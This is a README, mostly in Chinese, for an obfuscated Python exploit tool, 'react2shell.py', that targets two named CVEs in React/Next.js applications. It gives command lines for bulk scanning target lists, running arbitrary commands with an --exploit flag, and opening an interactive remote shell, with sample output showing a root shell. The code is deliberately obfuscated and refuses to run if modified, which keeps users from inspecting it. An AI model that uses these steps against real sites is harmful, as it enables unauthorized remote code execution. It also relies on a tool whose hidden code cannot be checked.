作者: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
版本: 2.0.0(混淆版)
日期: 2025-12-07
python react2shell.py
就是这样!扫描器将:
[1] Scan Single URL
[2] Scan Multiple URLs from File
[3] Exploit Single URL
[4] Exploit Multiple URLs from File
[5] Interactive Shell (Exploit Mode)
[6] Settings
[7] View Previous Results
[0] Exit
python react2shell.py
# Scan single URL
python react2shell.py -u https://target.com
# Scan multiple URLs
python react2shell.py -f targets.txt
# Exploit with command
python react2shell.py -u https://target.com --exploit -c "whoami"
# Bulk scan with threads
python react2shell.py -f targets.txt -t 20 -o results.json
每次运行扫描器时,它都会自动:
如果有人试图修改混淆代码:
[ERROR] Scanner integrity check FAILED!
[!] The scanner code has been tampered with.
[!] This is a protected tool by LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
如果检测到任何篡改,扫描器将拒绝运行。
所有原始功能均100%保留:
python react2shell.py -u https://example.com
输出:
=================================================================
CVE Scanner - CVE-2025-55182 & CVE-2025-66478
Author: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
=================================================================
[*] Scanning: https://example.com
[+] VULNERABLE: https://example.com
Version: 15.0.1
CVE-2025-55182: VULNERABLE
CVE-2025-66478: VULNERABLE
python react2shell.py
# Select option 5
# Enter target URL
Shell 会话:
shell> whoami
root
shell> pwd
/app
shell> ls -la
total 120
drwxr-xr-x 1 root root 4096 Dec 6 10:30 .
...
shell> exit
python react2shell.py -f targets.txt -t 20 -o results.json
此工具仅用于授权安全测试!
✅ 您自己的应用程序
✅ 经授权的渗透测试
✅ 漏洞赏金计划(在范围内)
✅ 安全研究(已授权)
❌ 未经授权的扫描
❌ 未经授权的漏洞利用
❌ 任何非法活动
❌ 违反服务条款
作者(LAKSHMIKANTHAN K)不对该工具的滥用负责。用户应对其行为负全部责任,并必须遵守所有适用法律。
原因: 文件已损坏
解决方案: 下载一份全新的副本
原因: 文件已被修改
解决方案: 下载一份全新的副本(请勿修改文件)
原因: 缺少依赖项
解决方案:
pip install requests urllib3
原因: 解压开销(极小)
注意: 仅在启动时发生一次,之后将以全速运行
答: 代码经过混淆和压缩。如果您需要阅读代码,可以使用原始的未混淆版本。
答: 影响极小。启动时解压会有短暂延迟(约 0.1 秒),之后全速运行。
答: 不可以。任何修改都会破坏完整性检查,扫描器将拒绝运行。
答: 混淆不是加密。坚定的攻击者仍然可以对其进行逆向工程,但这非常困难且耗时。
答: 通过 Instagram 联系作者:@letchu_pkt
姓名: LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
如果您遇到问题:
pip install requests urllib3
python react2shell.py
从交互式菜单中选择,或使用 CLI 模式。
按照提示操作,或提供命令行参数。
# Interactive mode
python react2shell.py
# Scan single URL
python react2shell.py -u https://target.com
# Bulk scan
python react2shell.py -f targets.txt -t 20
# Exploit
python react2shell.py -u https://target.com --exploit -c "whoami"
# Help
python react2shell.py --help
LAKSHMIKANTHAN K (letchupkt)
Instagram: @letchu_pkt
感谢您使用 CVE 扫描器!🚀
版本: 2.0.0(混淆版)
日期: 2025-12-07
许可证: 仅限授权安全测试